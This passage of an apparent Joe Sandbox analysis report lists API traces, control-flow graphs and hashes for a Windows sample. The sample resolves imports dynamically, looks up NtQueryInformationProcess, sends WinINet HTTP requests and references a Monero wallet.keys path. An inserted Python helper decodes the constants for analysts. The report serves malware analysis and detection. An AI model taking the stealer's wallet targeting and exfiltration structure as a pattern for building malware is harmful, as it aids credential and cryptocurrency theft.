                            • GetProcAddress.KERNEL32(77190000,012B1738), ref: 00689A27
                            • GetProcAddress.KERNEL32(77190000,012B14F8), ref: 00689A3F
                            • GetProcAddress.KERNEL32(77190000,012A5508), ref: 00689A57
                            • GetProcAddress.KERNEL32(77190000,012B1870), ref: 00689A70
                            • GetProcAddress.KERNEL32(77190000,012A56C8), ref: 00689A88
                            • LoadLibraryA.KERNEL32(012B18B8,?,00686A00), ref: 00689A9A
                            • LoadLibraryA.KERNEL32(012B18A0,?,00686A00), ref: 00689AAB
                            • LoadLibraryA.KERNEL32(012B1858,?,00686A00), ref: 00689ABD
                            • LoadLibraryA.KERNEL32(012B1828,?,00686A00), ref: 00689ACF
                            • LoadLibraryA.KERNEL32(012B1888,?,00686A00), ref: 00689AE0
                            • GetProcAddress.KERNEL32(76850000,012B17F8), ref: 00689B02
                            • GetProcAddress.KERNEL32(77040000,012B1810), ref: 00689B23
                            • GetProcAddress.KERNEL32(77040000,012B1840), ref: 00689B3B
                            • GetProcAddress.KERNEL32(75A10000,012B9068), ref: 00689B5D
                            • GetProcAddress.KERNEL32(75690000,012A53C8), ref: 00689B7E
                            • GetProcAddress.KERNEL32(776F0000,012B8A48), ref: 00689B9F
                            • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00689BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00689BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: f53d8814f2569a682390e1abf0e22acac84d46a38cbdc725f800bd66523d74c9
                            • Instruction ID: 78309bd6c08e393ee3e91103abc583e7ebee967f537d0cf774e0c11139bb6cc6
                            • Opcode Fuzzy Hash: f53d8814f2569a682390e1abf0e22acac84d46a38cbdc725f800bd66523d74c9
                            • Instruction Fuzzy Hash: FCA19FB5508640AFC35CEFA8FD889663BF9F74C301754472AE659C3634DB3A9841CB2A

                            Control-flow Graph (basic blocks with the APIs they call; edges as source -> target)
                            • 764: 6745c0-674695, RtlAllocateHeap -> 781
                            • 781: 6746a0-6746a6 -> 782, 783
                            • 782: 67474f-6747a9, VirtualProtect
                            • 783: 6746ac-67474a -> 781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0067460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0067479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (the same sentence is referenced 30 times in this function): 006745C7, 006745D2, 006745DD, 006745E8, 006745F3, 00674617, 00674622, 0067462D, 00674638, 00674643, 00674657, 00674662, 0067466D, 00674678, 00674683, 006746AC, 006746B7, 006746C2, 006746CD, 006746D8, 00674713, 0067471E, 00674729, 00674734, 0067473F, 0067474F, 0067475A, 00674765, 00674770, 0067477B
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence repeated 30 times, '$'-separated, one per xref in the Strings list above)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 05a19268384055edfed209a6ef7dbf1e4fac16bdd1d190c2ba487650e4def7d4
                            • Instruction ID: a0aefc66302cf818270491f28ef25d276da5f776e2d532749f23d86a9fdd9839
                            • Opcode Fuzzy Hash: 05a19268384055edfed209a6ef7dbf1e4fac16bdd1d190c2ba487650e4def7d4
                            • Instruction Fuzzy Hash: E6411530FDF604EACE25B7A4A8FEDDD7B5B6F53F04F415088BC2752680CAA26500C696

                            Control-flow Graph (basic blocks with the calls they make; edges as source -> target)
                            • 801: 674880-674942, call 68a7a0, call 6747b0, call 68a740 * 5, InternetOpenA, StrCmpCA -> 816, 817
                            • 816: 674944 -> 817
                            • 817: 67494b-67494f -> 818, 819
                            • 818: 674955-674acd, call 688b60, call 68a920, call 68a8a0, call 68a800 * 2, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a920, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a920, call 68a8a0, call 68a800 * 2, InternetConnectA -> 819, 905
                            • 819: 674ecb-674ef3, InternetCloseHandle, call 68aad0, call 679ac0 -> 829, 830
                            • 829: 674ef5-674f2d, call 68a820, call 68a9b0, call 68a8a0, call 68a800 -> 830
                            • 830: 674f32-674fa2, call 688990 * 2, call 68a7a0, call 68a800 * 8
                            • 905: 674ad3-674ad7 -> 906, 907
                            • 906: 674ae5 -> 908
                            • 907: 674ad9-674ae3 -> 908
                            • 908: 674aef-674b22, HttpOpenRequestA -> 909, 910
                            • 909: 674ebe-674ec5, InternetCloseHandle -> 819
                            • 910: 674b28-674e28, call 68a9b0, call 68a8a0, call 68a800, call 68a920, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a920, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a920, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a9b0, call 68a8a0, call 68a800, call 68a920, call 68a8a0, call 68a800, call 68a740, call 68a920 * 2, call 68a8a0, call 68a800 * 2, call 68aad0, lstrlen, call 68aad0 * 2, lstrlen, call 68aad0, HttpSendRequestA -> 1021
                            • 1021: 674e32-674e5c, InternetReadFile -> 1022, 1023
                            • 1022: 674e67-674eb9, InternetCloseHandle, call 68a800 -> 909
                            • 1023: 674e5e-674e65 -> 1022, 1024
                            • 1024: 674e69-674ea7, call 68a9b0, call 68a8a0, call 68a800 -> 1021
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00674915
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 0067493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00674ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00690DDB,00000000,?,?,00000000,?,",00000000,?,012BF4B0), ref: 00674DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00674E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00674E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00674E49
                            • InternetCloseHandle.WININET(00000000), ref: 00674EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00674EC5
                            • HttpOpenRequestA.WININET(00000000,012BF4A0,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00674B15
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • InternetCloseHandle.WININET(00000000), ref: 00674ECF
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: b7dd21d8f9ac918c3f49f4aa893bf2967a70252c829dbbcc5ff1d13c57987c00
                            • Instruction ID: b8ac00ca8e09ae115719ae5b5f50ea4f72599b96d9ac2bd88c8a81cf9471bc91
                            • Opcode Fuzzy Hash: b7dd21d8f9ac918c3f49f4aa893bf2967a70252c829dbbcc5ff1d13c57987c00
                            • Instruction Fuzzy Hash: 6412EC71911118AAEB55FB90DC92FEEB33AAF14300F50429EF50672491EF742F49CB6A
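The listings above show three things worth reading with the constants resolved: the import resolver (GetProcAddress/LoadLibraryA, ending in a clear-text NtQueryInformationProcess lookup), the RtlAllocateHeap/VirtualProtect function whose new protection is 00000100, and the WinINet request routine (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile in a loop). The report prints every argument as a raw hex word. The Python below is an added helper for reading such listings; it is not part of the Joe Sandbox report or of the analysed sample. It parses lines in the report's own "APIs" format and maps the argument positions that hold scalar constants to their documented Win32 names (the tables are the standard wininet.h/winnt.h values); the sample input is copied from the listings above, and the sandbox's "?" placeholders and pointer arguments are left as they are.

```python
"""Decode the constants in Joe Sandbox "APIs" lines into Win32 symbolic names.

Added helper for reading the listings above, not part of the Joe Sandbox
report or of the analysed sample. The sandbox prints "?" for arguments it
could not recover and raw addresses for pointers; only scalar positions are decoded.
"""
import re
from collections import Counter

# One "APIs" line, with or without the "Part of subcall function" prefix.
API_LINE = re.compile(
    r"(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")

# Documented Win32 values (wininet.h / winnt.h).
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                    3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x00000200: "INTERNET_FLAG_NO_UI",
                  0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
                  0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00800000: "INTERNET_FLAG_SECURE",
                  0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x80000000: "INTERNET_FLAG_RELOAD"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIER = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}


def decode_bits(value, table):
    """OR-ed flag word -> 'NAME|NAME'; bits not in the table stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    if value & ~sum(table):                 # keys are distinct single bits, so sum == OR
        names.append(f"0x{value & ~sum(table):X}")
    return "|".join(names) if names else "0"


def decode_protect(value):
    """Page protection: one base value in the low byte plus modifier bits above it."""
    base = value & 0xFF
    names = [PAGE_BASE.get(base, f"0x{base:X}")] if base else []
    names += [name for bit, name in sorted(PAGE_MODIFIER.items()) if value & bit]
    return "|".join(names) if names else "0"


# 0-based argument positions that hold scalar constants, and how to read each one.
DECODERS = {
    "InternetOpenA": {1: lambda v: INTERNET_OPEN_TYPE.get(v, hex(v))},       # dwAccessType
    "InternetConnectA": {2: int, 5: lambda v: INTERNET_SERVICE.get(v, hex(v))},  # nServerPort, dwService
    "HttpOpenRequestA": {6: lambda v: decode_bits(v, INTERNET_FLAGS)},        # dwFlags
    "InternetReadFile": {2: int},                                             # dwNumberOfBytesToRead
    "VirtualProtect": {1: int, 2: decode_protect},                            # dwSize, flNewProtect
}


def decode_calls(lines):
    """Parse report lines into dicts; 'decoded' maps argument index -> symbolic value."""
    calls = []
    for line in lines:
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        call = {"api": m["api"], "module": m["mod"], "args": args, "ref": m["ref"], "decoded": {}}
        for idx, fn in DECODERS.get(call["api"], {}).items():
            if idx < len(args) and HEX8.fullmatch(args[idx]):   # "?" stays undecoded
                call["decoded"][idx] = fn(int(args[idx], 16))
        calls.append(call)
    return calls


def getprocaddress_by_module(calls):
    """GetProcAddress count per module base, plus the names the sandbox printed in
    clear (the other name arguments are pointers into the sample's own buffers)."""
    per_module, clear_names = Counter(), {}
    for call in calls:
        if call["api"] != "GetProcAddress" or len(call["args"]) < 2:
            continue
        base, name = call["args"][0], call["args"][1]
        per_module[base] += 1
        if name != "?" and not HEX8.fullmatch(name):
            clear_names.setdefault(base, []).append(name)
    return per_module, clear_names


# Copied verbatim from the API listings in this report.
REPORT_LINES = [
    "• GetProcAddress.KERNEL32(77190000,012B17C8), ref: 00689995",
    "• GetProcAddress.KERNEL32(776F0000,012B8A48), ref: 00689B9F",
    "• GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00689BB6",
    "• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0067479C",
    "• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00674915",
    "• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00674ABA",
    "• HttpOpenRequestA.WININET(00000000,012BF4A0,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00674B15",
    "• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00674E49",
    "• Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849",
]

if __name__ == "__main__":
    calls = decode_calls(REPORT_LINES)
    for c in calls:
        shown = [str(c["decoded"].get(i, a)) for i, a in enumerate(c["args"])]
        print(f"{c['api']}({', '.join(shown)})  @ {c['ref']}")
    print(getprocaddress_by_module(calls))
```

Run as a script it prints each call with its constants substituted. For the lines above that gives InternetOpenA with INTERNET_OPEN_TYPE_DIRECT (the request bypasses the system proxy configuration, so proxy logs alone will not show it), InternetConnectA with INTERNET_SERVICE_HTTP, HttpOpenRequestA with INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, InternetReadFile pulling 1999 (0x7CF) bytes per loop iteration, and VirtualProtect with PAGE_GUARD and no base protection. Two caveats on that last call before treating it as the guard-page trick the signature list names: Windows accepts PAGE_GUARD only together with a base protection other than PAGE_NOACCESS, and VirtualProtect fails when lpflOldProtect is NULL, which is what the captured fourth argument shows, so the sandbox's argument capture for this call should be confirmed in a debugger.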
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006711B7), ref: 00687880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0068789F
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 71aa66f29927e053b54f7e2de70abdda607e9f4359d670733cf74fbf16ec8805
                            • Instruction ID: 03152a2bba428dd0d0e8139d05c438067915efbbaf8fb19326dba88343a1d68e
                            • Opcode Fuzzy Hash: 71aa66f29927e053b54f7e2de70abdda607e9f4359d670733cf74fbf16ec8805
                            • Instruction Fuzzy Hash: 41F04FF1944208ABC704DF98DD49FAEBBB8FB04711F10026AFA05A2680C77555048BA1
                            APIs
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: c15d7193b14491d3865bc19698ca32ddcb7b1843a629d324139ff7db2b80e39f
                            • Instruction ID: 79502440fc4bf89341e9ed9f13e342ab5c2f110ece3341489340809e2e36844d
                            • Opcode Fuzzy Hash: c15d7193b14491d3865bc19698ca32ddcb7b1843a629d324139ff7db2b80e39f
                            • Instruction Fuzzy Hash: 34D05E7490430CDBCB04DFE0D8496DDBB78FB08321F000695D90562340EA315481CAAA

                            Control-flow Graph (basic blocks with the APIs they call; edges as source -> target)
                            • 633: 689c10-689c1a -> 634, 635
                            • 634: 689c20-68a031, GetProcAddress * 43 -> 635
                            • 635: 68a036-68a0ca, LoadLibraryA * 8 -> 636, 637
                            • 636: 68a0cc-68a141, GetProcAddress * 5 -> 637
                            • 637: 68a146-68a14d -> 638, 639
                            • 638: 68a153-68a211, GetProcAddress * 8 -> 639
                            • 639: 68a216-68a21d -> 640, 641
                            • 640: 68a298-68a29f -> 642, 643
                            • 641: 68a21f-68a293, GetProcAddress * 5 -> 640
                            • 642: 68a2a5-68a332, GetProcAddress * 6 -> 643
                            • 643: 68a337-68a33e -> 644, 645
                            • 644: 68a41f-68a426 -> 646, 647
                            • 645: 68a344-68a41a, GetProcAddress * 9 -> 644
                            • 646: 68a428-68a49d, GetProcAddress * 5 -> 647
                            • 647: 68a4a2-68a4a9 -> 648, 649
                            • 648: 68a4ab-68a4d7, GetProcAddress * 2 -> 649
                            • 649: 68a4dc-68a4e3 -> 650, 651
                            • 650: 68a515-68a51c -> 652, 653
                            • 651: 68a4e5-68a510, GetProcAddress * 2 -> 650
                            • 652: 68a612-68a619 -> 654, 655
                            • 653: 68a522-68a60d, GetProcAddress * 10 -> 652
                            • 654: 68a61b-68a678, GetProcAddress * 4 -> 655
                            • 655: 68a67d-68a684 -> 656, 657
                            • 656: 68a69e-68a6a5 -> 658, 659
                            • 657: 68a686-68a699, GetProcAddress -> 656
                            • 658: 68a708-68a709
                            • 659: 68a6a7-68a703, GetProcAddress * 4 -> 658
                            APIs
                            • GetProcAddress.KERNEL32(77190000,012A5548), ref: 00689C2D
                            • GetProcAddress.KERNEL32(77190000,012A5388), ref: 00689C45
                            • GetProcAddress.KERNEL32(77190000,012B8F90), ref: 00689C5E
                            • GetProcAddress.KERNEL32(77190000,012B8DC8), ref: 00689C76
                            • GetProcAddress.KERNEL32(77190000,012B8FA8), ref: 00689C8E
                            • GetProcAddress.KERNEL32(77190000,012BD320), ref: 00689CA7
                            • GetProcAddress.KERNEL32(77190000,012AA8E8), ref: 00689CBF
                            • GetProcAddress.KERNEL32(77190000,012BD2A8), ref: 00689CD7
                            • GetProcAddress.KERNEL32(77190000,012BD1B8), ref: 00689CF0
                            • GetProcAddress.KERNEL32(77190000,012BD0F8), ref: 00689D08
                            • GetProcAddress.KERNEL32(77190000,012BD050), ref: 00689D20
                            • GetProcAddress.KERNEL32(77190000,012A55A8), ref: 00689D39
                            • GetProcAddress.KERNEL32(77190000,012A54E8), ref: 00689D51
                            • GetProcAddress.KERNEL32(77190000,012A5468), ref: 00689D69
                            • GetProcAddress.KERNEL32(77190000,012A55C8), ref: 00689D82
                            • GetProcAddress.KERNEL32(77190000,012BD1E8), ref: 00689D9A
                            • GetProcAddress.KERNEL32(77190000,012BD110), ref: 00689DB2
                            • GetProcAddress.KERNEL32(77190000,012AA5C8), ref: 00689DCB
                            • GetProcAddress.KERNEL32(77190000,012A5488), ref: 00689DE3
                            • GetProcAddress.KERNEL32(77190000,012BD260), ref: 00689DFB
                            • GetProcAddress.KERNEL32(77190000,012BD170), ref: 00689E14
                            • GetProcAddress.KERNEL32(77190000,012BD1D0), ref: 00689E2C
                            • GetProcAddress.KERNEL32(77190000,012BD128), ref: 00689E44
                            • GetProcAddress.KERNEL32(77190000,012A55E8), ref: 00689E5D
                            • GetProcAddress.KERNEL32(77190000,012BD230), ref: 00689E75
                            • GetProcAddress.KERNEL32(77190000,012BD080), ref: 00689E8D
                            • GetProcAddress.KERNEL32(77190000,012BD098), ref: 00689EA6
                            • GetProcAddress.KERNEL32(77190000,012BD200), ref: 00689EBE
                            • GetProcAddress.KERNEL32(77190000,012BD2F0), ref: 00689ED6
                            • GetProcAddress.KERNEL32(77190000,012BD068), ref: 00689EEF
                            • GetProcAddress.KERNEL32(77190000,012BD218), ref: 00689F07
                            • GetProcAddress.KERNEL32(77190000,012BD2C0), ref: 00689F1F
                            • GetProcAddress.KERNEL32(77190000,012BD188), ref: 00689F38
                            • GetProcAddress.KERNEL32(77190000,012AFE38), ref: 00689F50
                            • GetProcAddress.KERNEL32(77190000,012BD308), ref: 00689F68
                            • GetProcAddress.KERNEL32(77190000,012BD1A0), ref: 00689F81
                            • GetProcAddress.KERNEL32(77190000,012A5628), ref: 00689F99
                            • GetProcAddress.KERNEL32(77190000,012BD038), ref: 00689FB1
                            • GetProcAddress.KERNEL32(77190000,012A54A8), ref: 00689FCA
                            • GetProcAddress.KERNEL32(77190000,012BD248), ref: 00689FE2
                            • GetProcAddress.KERNEL32(77190000,012BD0B0), ref: 00689FFA
                            • GetProcAddress.KERNEL32(77190000,012A5648), ref: 0068A013
                            • GetProcAddress.KERNEL32(77190000,012A5668), ref: 0068A02B
                            • LoadLibraryA.KERNEL32(012BD2D8,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A03D
                            • LoadLibraryA.KERNEL32(012BD278,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A04E
                            • LoadLibraryA.KERNEL32(012BD290,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A060
                            • LoadLibraryA.KERNEL32(012BD0C8,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A072
                            • LoadLibraryA.KERNEL32(012BD0E0,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A083
                            • LoadLibraryA.KERNEL32(012BD140,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A095
                            • LoadLibraryA.KERNEL32(012BD158,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A0A7
                            • LoadLibraryA.KERNEL32(012BD500,?,00685CA3,00690AEB,?,?,?,?,?,?,?,?,?,?,00690AEA,00690AE3), ref: 0068A0B8
                            • GetProcAddress.KERNEL32(77040000,012A50C8), ref: 0068A0DA
                            • GetProcAddress.KERNEL32(77040000,012BD440), ref: 0068A0F2
                            • GetProcAddress.KERNEL32(77040000,012B8A18), ref: 0068A10A
                            • GetProcAddress.KERNEL32(77040000,012BD5A8), ref: 0068A123
                            • GetProcAddress.KERNEL32(77040000,012A5288), ref: 0068A13B
                            • GetProcAddress.KERNEL32(73D20000,012AA988), ref: 0068A160
                            • GetProcAddress.KERNEL32(73D20000,012A4F88), ref: 0068A179
                            • GetProcAddress.KERNEL32(73D20000,012AA6B8), ref: 0068A191
                            • GetProcAddress.KERNEL32(73D20000,012BD620), ref: 0068A1A9
                            • GetProcAddress.KERNEL32(73D20000,012BD3F8), ref: 0068A1C2
                            • GetProcAddress.KERNEL32(73D20000,012A5068), ref: 0068A1DA
                            • GetProcAddress.KERNEL32(73D20000,012A5368), ref: 0068A1F2
                            • GetProcAddress.KERNEL32(73D20000,012BD3E0), ref: 0068A20B
                            • GetProcAddress.KERNEL32(768D0000,012A4FA8), ref: 0068A22C
                            • GetProcAddress.KERNEL32(768D0000,012A5228), ref: 0068A244
                            • GetProcAddress.KERNEL32(768D0000,012BD380), ref: 0068A25D
                            • GetProcAddress.KERNEL32(768D0000,012BD548), ref: 0068A275
                            • GetProcAddress.KERNEL32(768D0000,012A5028), ref: 0068A28D
                            • GetProcAddress.KERNEL32(75790000,012AA6E0), ref: 0068A2B3
                            • GetProcAddress.KERNEL32(75790000,012AA708), ref: 0068A2CB
                            • GetProcAddress.KERNEL32(75790000,012BD530), ref: 0068A2E3
                            • GetProcAddress.KERNEL32(75790000,012A4FC8), ref: 0068A2FC
                            • GetProcAddress.KERNEL32(75790000,012A5328), ref: 0068A314
                            • GetProcAddress.KERNEL32(75790000,012AA910), ref: 0068A32C
                            • GetProcAddress.KERNEL32(75A10000,012BD3C8), ref: 0068A352
                            • GetProcAddress.KERNEL32(75A10000,012A4FE8), ref: 0068A36A
                            • GetProcAddress.KERNEL32(75A10000,012B88D8), ref: 0068A382
                            • GetProcAddress.KERNEL32(75A10000,012BD410), ref: 0068A39B
                            • GetProcAddress.KERNEL32(75A10000,012BD458), ref: 0068A3B3
                            • GetProcAddress.KERNEL32(75A10000,012A5188), ref: 0068A3CB
                            • GetProcAddress.KERNEL32(75A10000,012A5008), ref: 0068A3E4
                            • GetProcAddress.KERNEL32(75A10000,012BD590), ref: 0068A3FC
                            • GetProcAddress.KERNEL32(75A10000,012BD560), ref: 0068A414
                            • GetProcAddress.KERNEL32(76850000,012A52C8), ref: 0068A436
                            • GetProcAddress.KERNEL32(76850000,012BD5C0), ref: 0068A44E
                            • GetProcAddress.KERNEL32(76850000,012BD5D8), ref: 0068A466
                            • GetProcAddress.KERNEL32(76850000,012BD428), ref: 0068A47F
                            • GetProcAddress.KERNEL32(76850000,012BD470), ref: 0068A497
                            • GetProcAddress.KERNEL32(75690000,012A5148), ref: 0068A4B8
                            • GetProcAddress.KERNEL32(75690000,012A5048), ref: 0068A4D1
                            • GetProcAddress.KERNEL32(769C0000,012A50E8), ref: 0068A4F2
                            • GetProcAddress.KERNEL32(769C0000,012BD3B0), ref: 0068A50A
                            • GetProcAddress.KERNEL32(6F8C0000,012A5128), ref: 0068A530
                            • GetProcAddress.KERNEL32(6F8C0000,012A5248), ref: 0068A548
                            • GetProcAddress.KERNEL32(6F8C0000,012A5268), ref: 0068A560
                            • GetProcAddress.KERNEL32(6F8C0000,012BD4D0), ref: 0068A579
                            • GetProcAddress.KERNEL32(6F8C0000,012A52A8), ref: 0068A591
                            • GetProcAddress.KERNEL32(6F8C0000,012A5108), ref: 0068A5A9
                            • GetProcAddress.KERNEL32(6F8C0000,012A52E8), ref: 0068A5C2
                            • GetProcAddress.KERNEL32(6F8C0000,012A5088), ref: 0068A5DA
                            • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0068A5F1
                            • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0068A607
                            • GetProcAddress.KERNEL32(75D90000,012BD578), ref: 0068A629
                            • GetProcAddress.KERNEL32(75D90000,012B8938), ref: 0068A641
                            • GetProcAddress.KERNEL32(75D90000,012BD5F0), ref: 0068A659
                            • GetProcAddress.KERNEL32(75D90000,012BD488), ref: 0068A672
                            • GetProcAddress.KERNEL32(76470000,012A5348), ref: 0068A693
                            • GetProcAddress.KERNEL32(702D0000,012BD608), ref: 0068A6B4
                            • GetProcAddress.KERNEL32(702D0000,012A50A8), ref: 0068A6CD
                            • GetProcAddress.KERNEL32(702D0000,012BD4A0), ref: 0068A6E5
                            • GetProcAddress.KERNEL32(702D0000,012BD4B8), ref: 0068A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: e3a7467977cb6ec20a88b8e34a7920984bf931d36b9692081575630b2f3a4781
                            • Instruction ID: 15743d4f5d31b53ceaebfcece8217a67905de85274a341da0d85ab06d19b4c42
                            • Opcode Fuzzy Hash: e3a7467977cb6ec20a88b8e34a7920984bf931d36b9692081575630b2f3a4781
